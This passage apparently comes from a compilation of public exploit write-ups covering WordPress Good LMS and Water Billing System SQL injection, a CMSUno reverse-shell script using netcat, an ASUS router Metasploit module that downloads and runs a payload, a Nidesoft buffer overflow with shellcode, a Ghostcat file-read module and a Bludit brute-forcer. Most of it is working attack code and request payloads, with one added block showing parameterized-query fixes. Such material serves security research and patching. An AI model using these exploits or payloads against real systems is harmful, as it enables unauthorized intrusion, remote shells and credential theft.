      <input type="hidden" name="table" value="users" />
      <input type="hidden" name="firstname" value="Administrator" />
      <input type="hidden" name="middlename" value="" />
      <input type="hidden" name="lastname" value="" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="newpass" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
  19. # Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
# Version: <= 2.1.4
# Dork: N/A
# Author: Abdulazeez Alaseeri
# Tested on: linux/apache
# Type: Web App
# Date: 2020-11-12
# Category: Web App

================================================================
Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
================================================================

Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850

Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701

================================================================
Start Vulnerable Code
================================================================

```php
682- add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
683- add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
684- function gdlr_lms_cancel_booking(){
685-     global $wpdb;
686-
687-     $sql = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
688-     $sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
689-     $sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
690-     $booked_course = $wpdb->get_row($sql);
691-     if( !empty($booked_course) ){
692-         $payment_info = unserialize($booked_course->payment_info);
693-
694-         $course_options = gdlr_lms_get_course_options($booked_course->course_id);
695-         $course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
696-         update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
697-
698-         $wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
699-     }
700-     die("");
701- }
```

================================================================
End Vulnerable Code
================================================================

Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user.

The following URL means that an attacker is already inside function "gdlr_lms_cancel_booking".

http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking

SQL Injection on line 688 is pretty simple to understand: an arbitrary user input in the POST request is sent straight into the MySQL query as variable "id"

$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';

Following are the Request Headers as POC which demonstrate a MySQL SLEEP query.

================================================================
Request Headers Start
================================================================

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)

================================================================
Request Headers Finish
================================================================
  20. # Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
# SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it...
# Exploit Author: Sarang Tumne (CyberInsane)
# Date: 4th Nov, 2020
# Confirmed on release 1.0
# Tested on: Windows Server 2016- XAMPP
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html

###############################################

POST /wbs/process.php HTTP/1.1
Host: 192.168.56.102:8080
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.102:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.56.102:8080/wbs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username='%20or%200%3d0%20#&password=password

Response:

HTTP/1.1 200 OK
Date: Mon, 02 Nov 2020 04:30:51 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
X-Powered-By: PHP/7.2.30
Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8

<script>windows: location="billing.php"</script>

=========================================================================

POST /wbs/process.php HTTP/1.1
Host: 192.168.56.102:8080
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.102:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.56.102:8080/wbs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=admin&password=a'%20or%20'a'%20%3d%20'a

Response:

HTTP/1.1 200 OK
Date: Mon, 02 Nov 2020 04:30:49 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
X-Powered-By: PHP/7.2.30
Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8

<script>windows: location="billing.php"</script>
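Posts 17, 19 and 20 above all come down to the same defect: request input concatenated into SQL text. The block below, added here as an example and not code from Good LMS, Customer Support System or Water Billing System, puts the string-built queries from those posts (`WHERE id=' . $_POST['id']` and `username='...' AND password='...'`) beside parameterized versions and runs both against an in-memory SQLite table that stands in for MySQL, so the bypass and its fix can be observed with the login payload from post 17. In WordPress the fixed booking query corresponds to `$wpdb->prepare()` with a `%d` placeholder; the table contents are constructed.

```python
"""Added example (not code from the advisories above): string-built SQL as in
posts 17, 19 and 20 beside parameterized queries, on a constructed SQLite DB."""
import sqlite3


def make_db():
    """Constructed tables shaped like the ones the vulnerable queries read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gdlrpayment (id INTEGER, payment_status TEXT)")
    conn.executemany("INSERT INTO gdlrpayment VALUES (?, ?)",
                     [(1, "pending"), (2, "paid"), (3, "reserved")])
    # Plaintext password only to keep the demo short; real code compares hashes.
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def cancel_booking_vulnerable(conn, booking_id):
    """Mirror of lines 687-689 of lightbox-form.php: the id is pasted into SQL."""
    sql = ("SELECT * FROM gdlrpayment WHERE id=" + str(booking_id) + " AND "
           "(payment_status='pending' OR payment_status='submitted' OR payment_status='reserved')")
    return conn.execute(sql).fetchall()


def cancel_booking_fixed(conn, booking_id):
    """Input coerced to an integer (what a %d placeholder in $wpdb->prepare
    does) and bound as a parameter; anything that is not an integer matches nothing."""
    try:
        booking_id = int(booking_id)
    except (TypeError, ValueError):
        return []
    sql = ("SELECT * FROM gdlrpayment WHERE id=? AND "
           "payment_status IN ('pending', 'submitted', 'reserved')")
    return conn.execute(sql, (booking_id,)).fetchall()


def login_vulnerable(conn, username, password):
    """Shape of the login queries in posts 17 and 20: both fields concatenated in."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    """Bound parameters: quote characters in the input are data, never syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 or ''='"   # the username value from post 17
    print("vulnerable login, bypass payload:", login_vulnerable(db, bypass, "password"))
    print("fixed login, bypass payload:     ", login_fixed(db, bypass, "password"))
    print("vulnerable cancel, '0 OR 1=1':   ", cancel_booking_vulnerable(db, "0 OR 1=1"))
    print("fixed cancel, '0 OR 1=1':        ", cancel_booking_fixed(db, "0 OR 1=1"))
```

The `0 OR 1=1` id shows why the booking query matters even without a timing payload: because `AND` binds tighter than `OR`, the concatenated form returns every pending or reserved booking, while the parameterized form rejects the value before it reaches the database.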
  21. # Exploit Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020.09.30
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://github.com/boiteasite/cmsuno/
# Software Link: https://github.com/boiteasite/cmsuno/
# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
# Version: 1.6.2
# Tested on: Kali Linux 2020.2
# CVE : N/A

```python
import requests
from bs4 import BeautifulSoup
import lxml
import json
from time import sleep

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")

login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"

session = requests.Session()
request = session.get(login_url)

# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)

# Get the second unox value
request = session.get(login_url)
text = request.text
soup = BeautifulSoup(text,"lxml")
script = soup.findAll('script')[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]

# Exploit
header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    "Accept":"*/",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": login_url,
    "Referer": login_url
}
payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)

# Login to trigger password.php
# Get the unox value
session1 = requests.Session()
request1 = session1.get(login_url)
soup = BeautifulSoup(request1.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']

# Login
sleep(3)
body = {"unox":unox,"user":username,"pass":password}
session1.post(login_url, data=body)
```
22. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ASUS TM-AC1900 - Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits a code execution vulnerability within the ASUS TM-AC1900 router
        as an authenticated user. The vulnerability is due to a failure to filter out percent
        encoded newline characters (%0a) within the HTTP argument 'SystemCmd' when invoking
        "/apply.cgi" which bypasses the patch for CVE-2018-9285.
      },
      'Author'         =>
        [
          'b1ack0wl' # vuln discovery + exploit developer
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'References'     =>
        [
          # CVE which shows that this functionality has been patched before ;)
          ['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'],
          ['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900']
        ],
      'Privileged'     => true,
      'Targets'        =>
        [
          # this may work on other asus routers as well, but I've only tested this on the TM-AC1900.
          [ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199', {} ]
        ],
      'DisclosureDate' => 'April 18, 2020',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin'])
      ])
  end

  def check_login
    begin
      res = send_request_cgi({
        'method'        => 'GET',
        'uri'           => "/Main_Analysis_Content.asp",
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      })
      if res and res.code == 200
        # all good :)
        return res
      else
        fail_with(Failure::NoAccess, 'Invalid password.')
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Connection failed.')
    end
  end

  def on_request_uri(cli, request)
    if request.uri == '/'
      # injected command has been executed
      print_good("Sending bash script...")
      @filename = rand_text_alpha(16)
      bash_script = %Q|
#!/bin/sh
wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename}
chmod +x /tmp/#{@filename}
/tmp/#{@filename} &
|
      send_response(cli, bash_script)
    else
      # bash script has been executed. serve up the ELF file
      exe_payload = generate_payload_exe()
      print_good("Sending ELF file...")
      send_response(cli, exe_payload)
      # clean up
      register_file_for_cleanup("/tmp/index.html")
      register_file_for_cleanup("/tmp/#{@filename}")
    end
  end

  def exploit
    # make sure the supplied password is correct
    check_login

    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      srv_host = datastore['LHOST']
    else
      srv_host = datastore['SRVHOST']
    end

    print_status("Exploiting #{target.name}...")
    @lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}"
    start_service({'Uri' => {'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => '/' }})

    begin
      # store the cmd to be executed
      cmd = "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;"
      cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html"
      res = send_request_cgi({
        'method'        => 'GET',
        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
        # spaces need to be '+' and not %20, so cheap hack.exe it is.
        # required HTTP args: SystemCmd, action_mode, and current_page
        'uri'           => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp"
      })
      # now trigger it via check_login
      res = check_login
      if res and res.code == 200
        print_status("Waiting up to 10 seconds for the payload to execute...")
        select(nil, nil, nil, 10)
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
23. # Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
# Date: 2020-07-30
# Author: Felipe Winsnes
# Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe
# Version: 2.6.18
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/

# Proof of Concept:

# 1.- Run the python script, it will create the file "poc.txt".
# 2.- Copy the content of the new file "poc.txt" to clipboard.
# 3.- Open the application.
# 4.- Paste the clipboard into the "License Code" parameter within registration.
# 5.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe3\xdb\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x48\x68\x6d"
buf += b"\x52\x43\x30\x57\x70\x33\x30\x65\x30\x6c\x49\x78\x65"
buf += b"\x70\x31\x6f\x30\x51\x74\x6e\x6b\x50\x50\x34\x70\x6c"
buf += b"\x4b\x73\x62\x76\x6c\x4c\x4b\x52\x72\x45\x44\x6e\x6b"
buf += b"\x44\x32\x71\x38\x56\x6f\x6e\x57\x32\x6a\x31\x36\x55"
buf += b"\x61\x49\x6f\x6e\x4c\x45\x6c\x30\x61\x61\x6c\x53\x32"
buf += b"\x54\x6c\x47\x50\x6a\x61\x78\x4f\x74\x4d\x53\x31\x69"
buf += b"\x57\x6a\x42\x4b\x42\x43\x62\x53\x67\x6c\x4b\x50\x52"
buf += b"\x52\x30\x6c\x4b\x50\x4a\x55\x6c\x4e\x6b\x42\x6c\x36"
buf += b"\x71\x44\x38\x5a\x43\x30\x48\x73\x31\x6a\x71\x63\x61"
buf += b"\x6e\x6b\x56\x39\x35\x70\x37\x71\x68\x53\x4c\x4b\x71"
buf += b"\x59\x35\x48\x58\x63\x74\x7a\x32\x69\x4c\x4b\x65\x64"
buf += b"\x4c\x4b\x77\x71\x4a\x76\x65\x61\x79\x6f\x4e\x4c\x4b"
buf += b"\x71\x48\x4f\x46\x6d\x67\x71\x78\x47\x37\x48\x39\x70"
buf += b"\x72\x55\x39\x66\x45\x53\x61\x6d\x38\x78\x37\x4b\x73"
buf += b"\x4d\x77\x54\x32\x55\x6d\x34\x63\x68\x6e\x6b\x30\x58"
buf += b"\x45\x74\x65\x51\x6e\x33\x51\x76\x6c\x4b\x64\x4c\x72"
buf += b"\x6b\x6c\x4b\x63\x68\x67\x6c\x47\x71\x4b\x63\x6c\x4b"
buf += b"\x43\x34\x6e\x6b\x77\x71\x7a\x70\x4d\x59\x73\x74\x47"
buf += b"\x54\x74\x64\x53\x6b\x51\x4b\x61\x71\x51\x49\x30\x5a"
buf += b"\x73\x61\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x70\x5a\x4c"
buf += b"\x4b\x77\x62\x5a\x4b\x4e\x6d\x71\x4d\x72\x4a\x53\x31"
buf += b"\x4e\x6d\x4c\x45\x6c\x72\x33\x30\x65\x50\x37\x70\x76"
buf += b"\x30\x51\x78\x76\x51\x4e\x6b\x32\x4f\x6e\x67\x59\x6f"
buf += b"\x58\x55\x6f\x4b\x49\x70\x77\x6d\x47\x5a\x75\x5a\x72"
buf += b"\x48\x4d\x76\x6c\x55\x4f\x4d\x6f\x6d\x69\x6f\x49\x45"
buf += b"\x57\x4c\x63\x36\x43\x4c\x54\x4a\x4f\x70\x79\x6b\x39"
buf += b"\x70\x64\x35\x43\x35\x6f\x4b\x37\x37\x64\x53\x72\x52"
buf += b"\x52\x4f\x61\x7a\x45\x50\x63\x63\x79\x6f\x6b\x65\x35"
buf += b"\x33\x63\x51\x32\x4c\x61\x73\x54\x6e\x75\x35\x72\x58"
buf += b"\x43\x55\x63\x30\x41\x41"

jmpesp = struct.pack("<I", 0x66C33BEB)

buffer = "A" * 4592 + jmpesp + "\x41\x49" * 5 + buf + "\xff" * 2000

f = open ("poc.txt", "w")
f.write(buffer)
f.close()
24. require "msf/core"

class MetasploitModule < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      "Name"        => "Ghostcat",
      "Description" => %q{
        When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming
        connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than,
        for example, a similar HTTP connection. If such connections are available to an attacker,
        they can be exploited in ways that may be surprising.

        In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped
        with an AJP Connector enabled by default that listened on all configured IP addresses.
        It was expected (and recommended in the security guide) that this Connector would be
        disabled if not required.

        This vulnerability report identified a mechanism that allowed:
        - returning arbitrary files from anywhere in the web application
        - processing any file in the web application as a JSP

        Further, if the web application allowed file upload and stored those files within the web
        application (or the attacker was able to control the content of the web application by some
        other means) then this, along with the ability to process a file as a JSP, made remote code
        execution possible.

        It is important to note that mitigation is only required if an AJP port is accessible to
        untrusted users. Users wishing to take a defence-in-depth approach and block the vector that
        permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31,
        8.5.51 or 7.0.100 or later.

        A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden
        the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or
        later will need to make small changes to their configurations.
      },
      "Author"      =>
        [
          "A Security Researcher of Chaitin Tech", #POC
          "ThienNV - SunCSR" #Metasploit Module
        ],
      "License"     => MSF_LICENSE,
      "References"  =>
        [
          [ "CVE", "2020-1938"]
        ],
      "Privileged"  => false,
      "Platform"    => %w{ java linux win},
      "Targets"     =>
        [
          ["Automatic", { "Arch" => ARCH_JAVA, "Platform" => "win" } ],
          [ "Java Windows", { "Arch" => ARCH_JAVA, "Platform" => "win" } ],
          [ "Java Linux", { "Arch" => ARCH_JAVA, "Platform" => "linux" } ]
        ],
      "DefaultTarget" => 0))

    register_options(
      [
        OptString.new("FILENAME",[true,"File name","/WEB-INF/web.xml"]),
        OptBool.new('SSL', [ true, 'SSL', false ]),
        OptPort.new('PORTWEB', [ false, 'Set a port webserver'])
      ],self.class)
  end

  def method2code(method)
    methods = {
      "OPTIONS"  => 1,
      "GET"      => 2,
      "HEAD"     => 3,
      "POST"     => 4,
      "PUT"      => 5,
      "DELETE"   => 6,
      "TRACE"    => 7,
      "PROPFIND" => 8
    }
    code = methods[method]
    return code
  end

  def make_headers(headers)
    header2code = {
      "accept"          => "\xA0\x01",
      "accept-charset"  => "\xA0\x02",
      "accept-encoding" => "\xA0\x03",
      "accept-language" => "\xA0\x04",
      "authorization"   => "\xA0\x05",
      "connection"      => "\xA0\x06",
      "content-type"    => "\xA0\x07",
      "content-length"  => "\xA0\x08",
      "cookie"          => "\xA0\x09",
      "cookie2"         => "\xA0\x0A",
      "host"            => "\xA0\x0B",
      "pragma"          => "\xA0\x0C",
      "referer"         => "\xA0\x0D",
      "user-agent"      => "\xA0\x0E"
    }
    headers_ajp = Array.new
    for (header_name, header_value) in headers do
      code = header2code[header_name].to_s
      if code != ""
        headers_ajp.append(code)
        headers_ajp.append(ajp_string(header_value.to_s))
      else
        headers_ajp.append(ajp_string(header_name.to_s))
        headers_ajp.append(ajp_string(header_value.to_s))
      end
    end
    return int2byte(headers.length,2), headers_ajp
  end

  def make_attributes(attributes)
    attribute2code = {
      "remote_user"   => "\x03",
      "auth_type"     => "\x04",
      "query_string"  => "\x05",
      "jvm_route"     => "\x06",
      "ssl_cert"      => "\x07",
      "ssl_cipher"    => "\x08",
      "ssl_session"   => "\x09",
      "req_attribute" => "\x0A",
      "ssl_key_size"  => "\x0B"
    }
    attributes_ajp = Array.new
    for attr in attributes
      name = attr.keys.first.to_s
      code = (attribute2code[name]).to_s
      value = attr[name]
      if code != ""
        attributes_ajp.append(code)
        if code == "\x0A"
          for v in value
            attributes_ajp.append(ajp_string(v.to_s))
          end
        else
          attributes_ajp.append(ajp_string(value.to_s))
        end
      end
    end
    return attributes_ajp
  end

  def ajp_string(message_bytes)
    message_len_int = message_bytes.length
    return int2byte(message_len_int,2) + message_bytes + "\x00"
  end

  def int2byte(data, byte_len=1)
    if byte_len == 1
      return [data].pack("C")
    else
      return [data].pack("n*")
    end
  end

  def make_forward_request_package(method,headers,attributes)
    prefix_code_int = 2
    prefix_code_bytes = int2byte(prefix_code_int)
    method_bytes = int2byte(method2code(method))
    protocol_bytes = "HTTP/1.1"
    req_uri_bytes = "/index.txt"
    remote_addr_bytes = "127.0.0.1"
    remote_host_bytes = "localhost"
    server_name_bytes = datastore['RHOST'].to_s
    if datastore['SSL'] == true
      is_ssl_boolean = 1
    else
      is_ssl_boolean = 0
    end
    server_port_int = datastore['PORTWEB']
    if server_port_int.to_s == ""
      server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
    end
    is_ssl_bytes = int2byte(is_ssl_boolean,1)
    server_port_bytes = int2byte(server_port_int, 2)
    headers.append(["host", "#{server_name_bytes}:#{server_port_int}"])
    num_headers_bytes, headers_ajp_bytes = make_headers(headers)
    attributes_ajp_bytes = make_attributes(attributes)
    message = Array.new
    message.append(prefix_code_bytes)
    message.append(method_bytes)
    message.append(ajp_string(protocol_bytes.to_s))
    message.append(ajp_string(req_uri_bytes.to_s))
    message.append(ajp_string(remote_addr_bytes.to_s))
    message.append(ajp_string(remote_host_bytes.to_s))
    message.append(ajp_string(server_name_bytes.to_s))
    message.append(server_port_bytes)
    message.append(is_ssl_bytes)
    message.append(num_headers_bytes)
    message += headers_ajp_bytes
    message += attributes_ajp_bytes
    message.append("\xff")
    message_bytes = message.join
    send_bytes = "\x12\x34" + ajp_string(message_bytes.to_s)
    return send_bytes
  end

  def send_recv_once(data)
    buf = ""
    begin
      connect(true, {'RHOST'=>"#{datastore['RHOST'].to_s}", 'RPORT'=>datastore['RPORT'].to_i, 'SSL'=>datastore['SSL']})
      sock.put(data)
      buf = sock.get_once || ""
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    ensure
      disconnect
    end
    return buf
  end

  def read_buf_string(buf, idx)
    len = buf[idx..(idx+2)].unpack('n')[0]
    idx += 2
    print "#{buf[idx..(idx+len)]}"
    idx += len + 1
    idx
  end

  def parse_response(buf, idx)
    common_response_headers = {
      "\x01" => "Content-Type",
      "\x02" => "Content-Language",
      "\x03" => "Content-Length",
      "\x04" => "Date",
      "\x05" => "Last-Modified",
      "\x06" => "Location",
      "\x07" => "Set-Cookie",
      "\x08" => "Set-Cookie2",
      "\x09" => "Servlet-Engine",
      "\x0a" => "Status",
      "\x0b" => "WWW-Authenticate",
    }
    idx += 2
    idx += 2
    if buf[idx] == "\x04"
      idx += 1
      print "Status Code: "
      idx += 2
      idx = read_buf_string(buf, idx)
      puts
      header_num = buf[idx..(idx+2)].unpack('n')[0]
      idx += 2
      for i in 1..header_num
        if buf[idx] == "\xA0"
          idx += 1
          print "#{common_response_headers[buf[idx]]}: "
          idx += 1
          idx = read_buf_string(buf, idx)
          puts
        else
          idx = read_buf_string(buf, idx)
          print(": ")
          idx = read_buf_string(buf, idx)
          puts
        end
      end
    elsif buf[idx] == "\x05"
      return 0
    elsif buf[idx] == "\x03"
      idx += 1
      puts
      idx = read_buf_string(buf, idx)
    else
      return 1
    end
    parse_response(buf, idx)
  end

  def run
    headers = Array.new
    method = "GET"
    target_file = datastore['FILENAME'].to_s
    attributes = [
      {"req_attribute" => ["javax.servlet.include.request_uri", "index"]},
      {"req_attribute" => ["javax.servlet.include.path_info" , target_file]},
      {"req_attribute" => ["javax.servlet.include.servlet_path" , "/"]}
    ]
    data = make_forward_request_package(method, headers, attributes)
    buf = send_recv_once(data)
    parse_response(buf, 0)
  end
end
25. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'           => 'Bludit Panel Brute force',
      'Description'    => %q{
        This Module performs brute force attack on Bludit Panel.
      },
      'Author'         => 'Eren Simsek <egtorteam@gmail.com>',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'June 7 2020')

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Bludit Panel Uri', 'admin']),
        OptString.new('USERNAME', [ false, 'Bludit account username']),
        OptString.new('PASSWORD', [ false, 'Bludit account password']),
        OptPath.new('USER_FILE', [ false, 'The User wordlist path']),
        OptPath.new('PASS_FILE', [ false, 'The Pass wordlist path']),
        OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users']),
      ])
  end

  def check_variable
    if datastore["USERNAME"] != nil
      if datastore["USER_FILE"] != nil
        raise Msf::OptionValidateError.new(['USER_FILE'])
      end
    end
    if datastore["PASSWORD"] != nil
      if datastore["PASS_FILE"] != nil
        raise Msf::OptionValidateError.new(['PASS_FILE'])
      end
    end
    if datastore["USER_FILE"] != nil
      if datastore["USERNAME"] != nil
        raise Msf::OptionValidateError.new(['USERNAME'])
      end
    end
    if datastore["PASS_FILE"] != nil
      if datastore["PASSWORD"] != nil
        raise Msf::OptionValidateError.new(['PASSWORD'])
      end
    end
  end

  @signed = false

  def brute_force(username,password)
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path,'/'),
      'method' => 'GET',
    }) #Send request target website
    username = username.strip
    password = password.strip #strip command remove spaces
    bluditkey = res.get_cookies #Send request target website and get cookies
    csrf = res.body.scan(/<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)">/).flatten[0] || '' #Get CSRF Token
    if bluditkey == nil #if cookies not found
      fail_with(Failure::UnexpectedReply, "Cookie Not Found !")
    end
    if csrf == nil #if csrf token not found
      fail_with(Failure::UnexpectedReply, "CSRF Not Found !")
    end
    print_warning("Trying #{username}:#{password}")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path,'/'),
      'method' => 'POST',
      'cookie' => bluditkey,
      'headers' => {
        'X-Forwarded-For' => password, #host injected and unblock ip address
        'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer' => normalize_uri(target_uri.path,'/'),
      },
      'vars_post' => { #post method variables
        'tokenCSRF' => csrf,
        'username' => username,
        'password' => password,
        'save' => '',
